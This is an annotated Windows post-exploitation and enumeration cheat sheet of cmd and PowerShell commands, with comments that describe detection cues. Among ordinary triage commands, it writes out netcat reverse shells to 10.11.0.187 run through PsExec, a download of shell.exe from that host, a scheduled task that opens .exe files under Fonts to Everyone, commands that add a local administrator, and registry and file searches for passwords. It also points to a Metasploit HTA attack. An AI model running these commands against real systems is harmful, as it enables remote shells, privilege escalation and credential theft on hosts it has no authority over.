======
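:: Windows host triage / enumeration reference (cmd.exe unless marked PowerShell).
:: This is a command list, not a runnable script: <angle-bracket> and UPPERCASE
:: tokens are placeholders, and a few lines are bare fragments or paths kept as
:: notes. Where the extracted text had lost characters (markdown-eaten '*', '\',
:: '_' and notes fused onto the end of a command) the canonical command form is
:: restored and the note is moved into a comment.

:: --- Host / OS identity ---
systeminfo
:: Only the OS and architecture lines: /B anchors at line start, /C: is a literal.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
ver

:: --- Current user and token ---
echo %username%
:: Groups, privileges and integrity level of the current token.
whoami /all
:: Plain SET dumps the environment; the trailing "U All" in the original line
:: looks like extraction noise rather than valid syntax — TODO confirm intent.
SET U All

:: --- Account changes (high-signal events on a monitored host) ---
net user <user> <password> /add
net localgroup administrators /add <user>
:: /domain sends the change to the domain controller rather than the local SAM.
net group "HR Admins" myUser /add /domain

:: --- Network configuration and connections ---
ipconfig /all
route print
:: ARP cache (the documented switch is lowercase -a).
arp -A
:: -o adds the owning PID so each listener can be tied to tasklist output.
netstat -ano
netstat -ano -p TCP

:: --- Firewall state ---
:: Legacy "netsh firewall" context (deprecated; advfirewall below is current).
:: The original lines had the note "firewall state"/"firewall config" fused on.
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

:: --- Local users, shares, workstation config ---
net view
net users
net user user1
net config

:: --- Scheduled tasks ---
schtasks /query /fo LIST /v
:: Remove the SERVERQR task without confirmation (/F).
SCHTASKS /Delete /TN SERVERQR /F
:: Creates SERVERQR: a daily task that pipes "Y" into cacls to grant Everyone
:: full control over every .exe under C:\Windows\Fonts. "Fonts\*.exe" restored
:: (the backslash was lost). A task like this weakens ACLs and is worth alerting on.
SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts\*.exe /G everyone:f"

:: --- Processes, services, drivers ---
:: /SVC maps each process to the services it hosts.
tasklist /SVC
taskkill /PID pid
:: /F forces termination of every Windows Script Host instance.
taskkill /F /IM wscript.exe
net start
:: Binary path, start type and service account of one service.
sc qc [service_name]
:: The original line ended at "state="; "all" includes stopped services.
sc queryex state= all
DRIVERQUERY
:: PowerShell: CSV output turned into objects so the columns can be selected/sorted.
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
:: PowerShell. Restored the WMI class name Win32_PnPSignedDriver and "$_" (both
:: underscores were lost) and the wildcards around XBox so -like matches a substring.
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,DriverVersion,Manufacturer | ?{$_.DeviceName -like "*XBox*"}

:: --- File-system and registry searches for credentials ---
:: Wildcards restored; the original text had lost the '*' characters.
dir /a /s /b c:\*.pdf
dir /a /b c:\windows\kb*
:: /s recurses from the current directory, /i is case-insensitive. The text
:: "recursively from current directory" was fused onto the end of the original line.
findstr /si password *.txt *.xml *.xls *.ini *.inf
dir /s *pass* == *cred* == *vnc* == *.config*
:: Three independent queries (the original joined them with "|", which is not
:: meaningful for reg query): "password" in REG_SZ data under HKLM and HKCU,
:: then in value names (/v) under HKLM.
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /v password /t REG_SZ /s
:: Admin share on a remote host; a UNC path needs two leading backslashes (restored).
dir \\IP.ADD.RE.SS\C$
mountvol
:: AlwaysInstallElevated check: the value set to 1 under both keys lets any user
:: install MSI packages as SYSTEM — a misconfiguration to remove, not a feature.
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
dsquery
:: Prompts for the Administrator password; nothing sensitive on the command line.
runas /u:Administrator cmd.exe
:: Fragment: append to any command to copy its output to the clipboard.
| clip
:: ACLs of a program directory; write access for unprivileged users allows binary replacement.
cacls <Program File>
icacls
:: /q shows the owner of each entry.
dir /q
:: Opens the URL with the default handler.
explorer.exe http://10.11.0.187/index.html
:: Installed hotfixes — compare against the patch baseline.
wmic qfe get Caption,Description,HotFixID,InstalledOn
:: Kills a process by full path. svhost.exe under Fonts is not a Windows binary
:: location (svchost.exe lives in System32). NOTE: WQL string literals normally
:: need escaped backslashes ("\\"); the single backslashes are kept as written — confirm.
wmic process where ExecutablePath='C:\Windows\Fonts\svhost.exe' delete
:: PowerShell: wget is an alias of Invoke-WebRequest.
powershell -command "& {&'wget' http://10.11.0.187/shell.exe -OutFile shell.exe}"
:: PsExec copies PSEXESVC to the target and registers a service; the install is
:: recorded in the System log (Service Control Manager event 7045). -s runs as
:: SYSTEM, -d does not wait, -i interacts with the desktop. Credentials passed
:: on argv are visible in process listings.
PsExec.exe /accepteula -u <user> -p <pass> nc.exe -nv 10.11.0.187 8888 -e cmd.exe
PsExec.exe /accepteula -i -d -s nc.exe -nv 10.11.0.187 8889 -e cmd.exe
:: PowerShell download to a directory standard users can write.
Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt

:: --- Sysinternals AccessChk / Autoruns (permission and autostart audit) ---
:: /accepteula suppresses the license dialog so the tools run non-interactively.
accesschk.exe /accepteula
:: -u suppress errors, -w write access only, -s recurse.
accesschk.exe -uws "Everyone" "C:\Program Files"
Autorunsc.exe /accepteula
C:\Users\Public\accesschk64.exe /accepteula *
:: -v verbose, -q no banner, -p process objects.
accesschk.exe -vqp *
:: Directories (-d) writable by the given group anywhere under c:\.
accesschk.exe -uwdqs users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
:: Files writable by the given group; "c:\*.*" restored (backslash lost).
accesschk.exe -uwqs users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
:: /T recurses; lines mentioning Users show where unprivileged accounts hold rights.
cacls "c:\Program Files" /T | findstr Users
:: Points a mining-pool hostname at loopback via the hosts file (needs admin to write).
echo 127.0.0.1 my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts
:: Takes ownership of a file (requires admin or SeTakeOwnershipPrivilege).
takeown /F file.txt
:: Note kept from the original: start a Metasploit hta_server
:: (exploit/windows/misc/hta_server), then run "mshta.exe //<ip-addr>/random.hta"
:: on the host machine. mshta.exe loading a remote .hta is a common LOLBin detection.
:: Directories standard users can write to by default; watch for binaries dropped here.
C:\Windows\Temp
%USERPROFILE%\AppData\Local\

:: --- WMIC inventory (local and remote) ---
wmic group list brief
wmic qfe list brief
wmic desktop list brief
wmic cdrom list brief
wmic nic list brief
wmic product get name,version,vendor
wmic process get name,processid
wmic process where processid="1000" call terminate
:: Remote WMI execution; the password on the command line is exposed to process
:: listings and command history.
wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate
:: Enables Remote Desktop on a remote server through the RDToggle class. The
:: leading list dash and the stray space after "/password:" were removed.
wmic /node:"servername" /user:"user@domain" /password:"password" RDToggle where ServerName="server name" call SetAllowTSConnections 1
:: Batch FOR-loop body (%%A is the loop variable): per-host fixed-disk report
:: appended to SRVSPACE.CSV. The pipe before MORE was missing in the original;
:: MORE /E +2 starts output at line 2 to drop the leading header.
wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv | MORE /E +2 >> SRVSPACE.CSV
wmic logicaldisk get name,providername
:: Autostart entries (Win32_StartupCommand).
wmic startup get caption,command,user
:: Kept as written; the documented credential switch is /user: (as on the paint.exe
:: line above), so "/username:" may be a typo — confirm.
wmic /node:remotehost /username:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started
:: Download via certutil's URL cache (-split writes the fetched file). A well-known
:: LOLBin pattern; alert on it outside administrative change windows.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
:: Office protocol handler opening a remote macro-enabled template (.dotm) via an
:: ms-word: URI.
"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"
:: Autoruns: -x XML export; -m hides Microsoft-signed entries, -v verifies signatures.
autorunsc.exe -x > autoruns.xml
autorunsc.exe -m -v
:: Audit policy: dump current settings, then enable success auditing for logons.
auditpol /get /category:*
auditpol /set /subcategory:"Logon" /success:enable

:: --- Domain enumeration ---
net user /domain
net group /domain
:: PowerShell: LDAP search for user objects (samAccountType 805306368 = normal user
:: accounts). $searchstr must already hold an LDAP path.
$ldapsearch = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchstr); $objDomain = New-Object System.DirectoryServices.DirectoryEntry; $ldapsearch.SearchRoot = $objDomain; $ldapsearch.filter="samAccountType=805306368"; $ldapsearch.FindAll();
:: PowerView cmdlets (PowerSploit), not built-in Windows commands.
Get-NetLoggedon -ComputerName foobar
Get-NetSessions -ComputerName dc02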